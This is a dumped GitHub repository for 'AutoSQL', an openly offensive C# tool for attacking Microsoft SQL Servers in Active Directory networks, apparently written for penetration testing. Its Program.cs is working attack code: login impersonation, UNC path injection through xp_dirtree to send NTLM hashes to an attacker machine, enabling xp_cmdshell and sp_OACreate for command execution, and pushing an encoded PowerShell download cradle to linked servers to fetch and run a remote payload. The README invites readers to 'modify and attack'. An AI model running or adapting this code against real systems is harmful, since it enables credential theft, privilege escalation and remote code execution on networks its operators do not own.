├── AutoSQL
├── SQL.sln
└── SQL
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ └── AssemblyInfo.cs
│ ├── SQL.csproj
│ ├── bin
│ └── x64
│ │ └── Release
│ │ ├── SQL.exe.config
│ │ └── SQL.pdb
│ └── obj
│ ├── Debug
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ └── SQL.csprojAssemblyReference.cache
│ ├── Release
│ └── DesignTimeResolveAssemblyReferencesInput.cache
│ └── x64
│ └── Release
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── SQL.csproj.CoreCompileInputs.cache
│ ├── SQL.csproj.FileListAbsolute.txt
│ ├── SQL.csprojAssemblyReference.cache
│ ├── SQL.exe
│ └── SQL.pdb
├── LICENSE
└── README.md
/AutoSQL/SQL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29409.12
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SQL", "SQL\SQL.csproj", "{50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Debug|x64.ActiveCfg = Debug|x64
19 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Debug|x64.Build.0 = Debug|x64
20 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Release|x64.ActiveCfg = Release|x64
23 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {E0EDCE6B-5596-4004-A0D0-20573AA52A0A}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Data.SqlClient;
3 |
4 | namespace SQL
5 | {
6 | class Program
7 | {
8 | static void Main(string[] args)
9 | {
10 | Console.WriteLine("------------------------------------------------------------------------------------------");
11 | Console.WriteLine(" AutoSQL is a SQL enumeration and exploitation tool for AD environments");
12 | Console.WriteLine("------------------------------------------------------------------------------------------");
13 | Console.WriteLine("Author: Ananth Gottimukala aka she11z");
14 | Console.WriteLine(" LOVE OFFSEC");
15 | Console.WriteLine("------------------------------------------------------------------------------------------");
16 |
17 | Console.Write("\n[Q] Please enter SQL Server domain name (Mostly your current instance): ");
18 | String sqlServer = Console.ReadLine();
19 | Console.Write("[Q] Please enter database name (Mostly it will be master): ");
20 | String database = Console.ReadLine();
21 | String conString = "Server = " + sqlServer + "; Database = " + database + "; Integrated Security = True;";
22 | SqlConnection con = new SqlConnection(conString);
23 |
24 | try
25 | {
26 | con.Open();
27 | Console.WriteLine("\n[+] Authentication Success!");
28 | }
29 | catch
30 | {
31 | Console.WriteLine("[-] Authentication Failed");
32 | Environment.Exit(0);
33 | }
34 |
35 | String querylogin = "SELECT SYSTEM_USER;"; //SYSTEM_USER contains the system username of current session login
36 | SqlCommand command = new SqlCommand(querylogin, con);
37 | SqlDataReader reader = command.ExecuteReader();
38 | reader.Read();
39 | Console.WriteLine("[+] Logged in as " + reader[0]);
40 | reader.Close();
41 |
42 | String queryuser = "SELECT USER_NAME();"; //To get Mapped Username
43 | command = new SqlCommand(queryuser, con);
44 | reader = command.ExecuteReader();
45 | reader.Read();
46 | Console.WriteLine("[+] Mapped to User " + reader[0]);
47 | reader.Close();
48 |
49 | String querypublicrole = "SELECT IS_SRVROLEMEMBER('public');"; //Check for user in public role
50 | command = new SqlCommand(querypublicrole, con);
51 | reader = command.ExecuteReader();
52 | reader.Read();
53 | Int32 role = Int32.Parse(reader[0].ToString());
54 |
55 | if (role == 1)
56 | {
57 | Console.WriteLine("[+] User is a Member of Public Role");
58 | }
59 | else
60 | {
61 | Console.WriteLine("[-] User is NOT a Member of Public Role");
62 | }
63 | reader.Close();
64 |
65 | String querysysadminrole = "SELECT IS_SRVROLEMEMBER('sysadmin');"; //Check for user in sysadmin role
66 | command = new SqlCommand(querysysadminrole, con);
67 | reader = command.ExecuteReader();
68 | reader.Read();
69 | role = Int32.Parse(reader[0].ToString());
70 |
71 | if (role == 1)
72 | {
73 | Console.WriteLine("[+] User is a Member of SysAdmin Role");
74 | }
75 | else
76 | {
77 | Console.WriteLine("[-] User is NOT a Member of SysAdmin Role");
78 | }
79 | reader.Close();
80 |
81 | Console.WriteLine("\n[+] Checking which logins allow impersonation (if any) ...\n");
82 | String imp_query = "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id =b.principal_id WHERE a.permission_name = 'IMPERSONATE';";
83 | command = new SqlCommand(imp_query, con);
84 | reader = command.ExecuteReader();
85 |
86 | while (reader.Read() == true)
87 | {
88 | Console.WriteLine("---> " + reader[0]);
89 | }
90 | reader.Close();
91 |
92 | Console.Write("\n[Q] Do you want to test impersonation against any login if mentioned above? (y/n): ");
93 | String question1 = Console.ReadLine();
94 | if (question1 == "y")
95 | {
96 | try
97 | {
98 | Console.Write("[Q] Please enter the name of login to impersonate: ");
99 | String login_name = Console.ReadLine();
100 |
101 | Console.WriteLine("\n[+] Testing impersonating " + login_name + " login");
102 | queryuser = "SELECT SYSTEM_USER;";
103 | command = new SqlCommand(queryuser, con);
104 | reader = command.ExecuteReader();
105 | reader.Read();
106 | Console.WriteLine("[+] [Before Impersonation] running as " + reader[0]);
107 | reader.Close();
108 | String executeas = "EXECUTE AS LOGIN = '" + login_name + "';";
109 | command = new SqlCommand(executeas, con);
110 | reader = command.ExecuteReader();
111 | reader.Close();
112 | command = new SqlCommand(queryuser, con);
113 | reader = command.ExecuteReader();
114 | reader.Read();
115 | Console.WriteLine("[+] [After Impersonation] running as " + reader[0]);
116 | reader.Close();
117 |
118 | Console.WriteLine("\n[+] Testing impersonating dbo user in msdb");
119 | queryuser = "SELECT USER_NAME();";
120 | executeas = "use msdb; EXECUTE AS USER = 'dbo'";
121 | command = new SqlCommand(executeas, con);
122 | reader = command.ExecuteReader();
123 | reader.Close();
124 | command = new SqlCommand(queryuser, con);
125 | reader = command.ExecuteReader();
126 | reader.Read();
127 | Console.WriteLine("[+] [After Impersonation] running as " + reader[0]);
128 | reader.Close();
129 | }
130 | catch (Exception e)
131 | {
132 | Console.WriteLine("[-] Failed to Impersonate Message: " + e.Message);
133 | }
134 | }
135 | else
136 | {
137 | }
138 |
139 | Console.Write("\n[Q] Do you want to try get NET-NTLM Hash? [NOTE: Ensure Responder/Impacket is listening] (y/n): ");
140 | String question = Console.ReadLine();
141 | if (question == "y")
142 | {
143 | Console.Write("[Q] Please enter IP for attacker machine running Responder/Impacket: ");
144 | String smb_ip = Console.ReadLine();
145 | Console.WriteLine("[+] Trying to connect SMB share on " + smb_ip + " ...");
146 | String query = "EXEC master..xp_dirtree \"\\\\" + smb_ip + "\\\\test\";";
147 | command = new SqlCommand(query, con);
148 | reader = command.ExecuteReader();
149 | reader.Close();
150 | Console.WriteLine("[+] Please check Responder/Impacket interface on Kali");
151 | }
152 | else
153 | {
154 | }
155 |
156 | Console.Write("\n[Q] Do you want to try Command Execution on " + sqlServer + " as impersonated user? (y/n): ");
157 | String question2 = Console.ReadLine();
158 | if (question2 == "y")
159 | {
160 | Console.Write("[Q] Please enter the login name like sa: ");
161 | String implogin = Console.ReadLine();
162 | Console.Write("[Q] Please enter command to execute for technique-1 (xp_cmdshell): ");
163 | String cmd = Console.ReadLine();
164 | Console.WriteLine("\n[+] Trying technique-1 by enabling xp_cmdshell procedure if disabled ...");
165 | String impersonateUser = "EXECUTE AS LOGIN = '" + implogin + "';";
166 | String enable_xpcmdshell = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";
167 | String execcmd = "EXEC xp_cmdshell " + cmd;
168 |
169 | command = new SqlCommand(impersonateUser, con);
170 | reader = command.ExecuteReader();
171 | reader.Close();
172 |
173 | command = new SqlCommand(enable_xpcmdshell, con);
174 | reader = command.ExecuteReader();
175 | reader.Close();
176 |
177 | command = new SqlCommand(execcmd, con);
178 | reader = command.ExecuteReader();
179 | reader.Read();
180 | Console.WriteLine("[+] Command output - ");
181 | while (reader.Read())
182 | {
183 | Console.WriteLine(reader[0]);
184 | }
185 | reader.Close();
186 |
187 | Console.WriteLine("\n[+] Trying technique-2 by enabling sp_OACreate procedure if disabled ...");
188 | impersonateUser = "EXECUTE AS LOGIN = '" + implogin + "';";
189 | String enable_sp_oacreate = "EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;";
190 | execcmd = "DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'cmd /c \"echo she11z was here! > C:\\Windows\\Tasks\\she11z.txt\"';";
191 |
192 | command = new SqlCommand(enable_sp_oacreate, con);
193 | reader = command.ExecuteReader();
194 | reader.Close();
195 |
196 | command = new SqlCommand(execcmd, con);
197 | reader = command.ExecuteReader();
198 | Console.WriteLine("[+] As a POC, a file named she11z.txt is saved at C:\\Windows\\Tasks directory on SQL server");
199 | reader.Close();
200 | }
201 | else
202 | {
203 | }
204 |
205 | Console.Write("\n[Q] Do you want to check for linked SQL servers (This can be even done with unprivileged user/login)? (y/n): ");
206 | String question3 = Console.ReadLine();
207 | if (question3 == "y")
208 | {
209 | string execCmd = "EXEC sp_linkedservers;";
210 |
211 | command = new SqlCommand(execCmd, con);
212 | reader = command.ExecuteReader();
213 | Console.WriteLine("\n[+] Linked SQL Servers - ");
214 | while (reader.Read())
215 | {
216 | Console.WriteLine("---> " + reader[0]);
217 | }
218 | reader.Close();
219 | }
220 | else
221 | {
222 | }
223 |
224 | Console.Write("\n[Q] Do you want to check access on linked SQL servers (if mentioned above)? (y/n): ");
225 | String question4 = Console.ReadLine();
226 | if (question4 == "y")
227 | {
228 | Console.Write("[Q] Please enter linked SQL server name: ");
229 | try
230 | {
231 | string linkedsqlserver = Console.ReadLine();
232 | Console.WriteLine("[+] Checking access on: " + linkedsqlserver);
233 | string execLinkedServer = "select myuser from openquery(\"" + linkedsqlserver + "\", 'select SYSTEM_USER as myuser');";
234 | command = new SqlCommand(execLinkedServer, con);
235 | reader = command.ExecuteReader();
236 | reader.Read();
237 | Console.WriteLine("[+] Executing as " + reader[0] + " on " + linkedsqlserver);
238 | reader.Close();
239 | }
240 | catch (Exception e)
241 | {
242 | Console.WriteLine("[-] Cannot make connection to remote SQL server. RPC out could be disabled. Message: " + e.Message);
243 | Console.WriteLine("[-] In next question you can enable and do more...");
244 | }
245 | }
246 | else
247 | {
248 | }
249 |
250 | Console.Write("\n[Q] Do you want to enable RPC out, xp_cmdshell and execute command on remote SQL server (y/n)?: ");
251 | String question5 = Console.ReadLine();
252 | if (question5 == "y")
253 | {
254 | try
255 | {
256 | Console.Write("\n[Q] Do you want to impersonate any login like sa? Check output of linked SQL server access above (y/n): ");
257 | string question6 = Console.ReadLine();
258 | if (question6 == "y")
259 | {
260 | Console.Write("[Q] Please enter the name of login to impersonate: ");
261 | String login_name = Console.ReadLine();
262 |
263 | Console.WriteLine("\n[+] Testing impersonating " + login_name + " login");
264 | queryuser = "SELECT SYSTEM_USER;";
265 | command = new SqlCommand(queryuser, con);
266 | reader = command.ExecuteReader();
267 | reader.Read();
268 | Console.WriteLine("[+] [Before Impersonation] running as " + reader[0]);
269 | reader.Close();
270 | String executeas = "EXECUTE AS LOGIN = '" + login_name + "';";
271 | command = new SqlCommand(executeas, con);
272 | reader = command.ExecuteReader();
273 | reader.Close();
274 | command = new SqlCommand(queryuser, con);
275 | reader = command.ExecuteReader();
276 | reader.Read();
277 | Console.WriteLine("[+] [After Impersonation] running as " + reader[0]);
278 | reader.Close();
279 | }
280 | else
281 | {
282 | }
283 |
284 | Console.Write("\n[Q] Please enter remote SQL server name: ");
285 | string server = Console.ReadLine();
286 | Console.WriteLine("[+] Trying to enable RPC out using sp_serveroptions");
287 | string serveroption = "EXEC sp_serveroption [" + server + "], 'rpc out', 'true';";
288 | command = new SqlCommand(serveroption, con);
289 | reader = command.ExecuteReader();
290 | reader.Read();
291 | Console.WriteLine("[+] Done! RPC out enabled for remote SQL server");
292 | reader.Close();
293 |
294 | Console.WriteLine("[+] Enabling xp_cmdshell options");
295 | string enableoption = "EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT [" + server + "]";
296 | command = new SqlCommand(enableoption, con);
297 | reader = command.ExecuteReader();
298 | reader.Close();
299 | Console.WriteLine("[+] Enabling xp_cmdshell procedure");
300 | string enablexpcmdshell = "EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [" + server + "]";
301 | command = new SqlCommand(enablexpcmdshell, con);
302 | reader = command.ExecuteReader();
303 | reader.Close();
304 | Console.WriteLine("\n[NOTE] Please enter PS download cradle with EXACT single & double quotes format --> \"(New-Object System.Net.Webclient).DownloadString('http://XXX.YYY.XXX.ZZZ/Reflection.txt') | iex\"");
305 | Console.Write("\n[Q] Please enter PS download cradle: ");
306 | string shellcode = Console.ReadLine();
307 | string code = shellcode.Replace("\"","");
308 |
309 | var psCommandBytes = System.Text.Encoding.Unicode.GetBytes(code);
310 | var psCommandBase64 = Convert.ToBase64String(psCommandBytes);
311 |
312 |
313 | string shellcodecmd = "EXEC ('xp_cmdshell ''powershell -enc " + psCommandBase64 + "'';') AT [" + server + "]";
314 | Console.WriteLine("[+] Executing Shellcode on " + server + " .Please make sure listener is running");
315 | Console.WriteLine("\n[+] Your PS cradle: " + code);
316 | Console.WriteLine("[+] Whole xp_cmdshell command: " + shellcodecmd);
317 | command = new SqlCommand(shellcodecmd, con);
318 | reader = command.ExecuteReader();
319 | Console.WriteLine("\n[+] Output (if any) - ");
320 | while (reader.Read())
321 | {
322 | Console.WriteLine("---> " + reader[0]);
323 | }
324 | reader.Close();
325 | con.Close();
326 | }
327 | catch (Exception e)
328 | {
329 | Console.WriteLine("[-] Error: " + e.Message);
330 | Environment.Exit(0);
331 | }
332 |
333 | }
334 | else
335 | {
336 | }
337 | }
338 | }
339 | }
340 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SQL")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SQL")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("50a18b76-c1e6-45a1-8a04-4df9af4c151b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/SQL.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}
8 | Exe
9 | SQL
10 | SQL
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | MinimumRecommendedRules.ruleset
44 | true
45 |
46 |
47 | bin\x64\Release\
48 | TRACE
49 | true
50 | pdbonly
51 | x64
52 | 7.3
53 | prompt
54 | MinimumRecommendedRules.ruleset
55 | true
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/bin/x64/Release/SQL.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/bin/x64/Release/SQL.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/bin/x64/Release/SQL.pdb
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/Debug/SQL.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/Debug/SQL.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 0ad2913c3c24bfd3eb472a8770b9e4a19a0c875d
2 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | \\192.168.49.84\visualstudio\SQL\SQL\bin\x64\Release\SQL.exe.config
2 | \\192.168.49.84\visualstudio\SQL\SQL\bin\x64\Release\SQL.exe
3 | \\192.168.49.84\visualstudio\SQL\SQL\bin\x64\Release\SQL.pdb
4 | \\192.168.49.84\visualstudio\SQL\SQL\obj\x64\Release\SQL.csprojAssemblyReference.cache
5 | \\192.168.49.84\visualstudio\SQL\SQL\obj\x64\Release\SQL.exe
6 | \\192.168.49.84\visualstudio\SQL\SQL\obj\x64\Release\SQL.pdb
7 | \\192.168.49.84\visualstudio\SQL\SQL\obj\x64\Release\SQL.csproj.CoreCompileInputs.cache
8 | \\192.168.49.62\visualstudio\SQL\SQL\bin\x64\Release\SQL.exe.config
9 | \\192.168.49.62\visualstudio\SQL\SQL\bin\x64\Release\SQL.exe
10 | \\192.168.49.62\visualstudio\SQL\SQL\bin\x64\Release\SQL.pdb
11 | \\192.168.49.62\visualstudio\SQL\SQL\obj\x64\Release\SQL.csprojAssemblyReference.cache
12 | \\192.168.49.62\visualstudio\SQL\SQL\obj\x64\Release\SQL.exe
13 | \\192.168.49.62\visualstudio\SQL\SQL\obj\x64\Release\SQL.pdb
14 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/x64/Release/SQL.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/x64/Release/SQL.exe
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/x64/Release/SQL.pdb
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 she11z
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AutoSQL
2 | ## A tool to Enumerate and Exploit SQL Servers in AD Environments.
3 |
4 | ## Features:
5 |
6 | 1) Check authentication and roles on current instance as current logged in user.
7 | 2) Checks which logins can be impersonated.
8 | 3) Allows login impersonation.
9 | 4) Allows UNC path injection to grab NET-NTLM hash on Responder or Impacket.
10 | 5) Allows command execution test via xp_cmdshell and sp_OACreate procedures on current instance.
11 | 6) Checks for linked SQL servers in the domain.
12 | 7) Checks access on any linked SQL server.
13 | 8) Allows to enable RPC on current instance towards any linked SQL server and enables xp_cmdshell procedure to execute PS Command on remote linked SQL server.
14 |
15 | ### Please ping me at ananth DOT venk88 AT gmail DOT com for any changes or issues. Anyway folks, its a open source C# code, feel free to modify and attack ;)
16 |
17 | ## Love Offsec & Love Hacking!!
18 |
19 | Ananth Gottimukala
20 | (she11z)
21 |
--------------------------------------------------------------------------------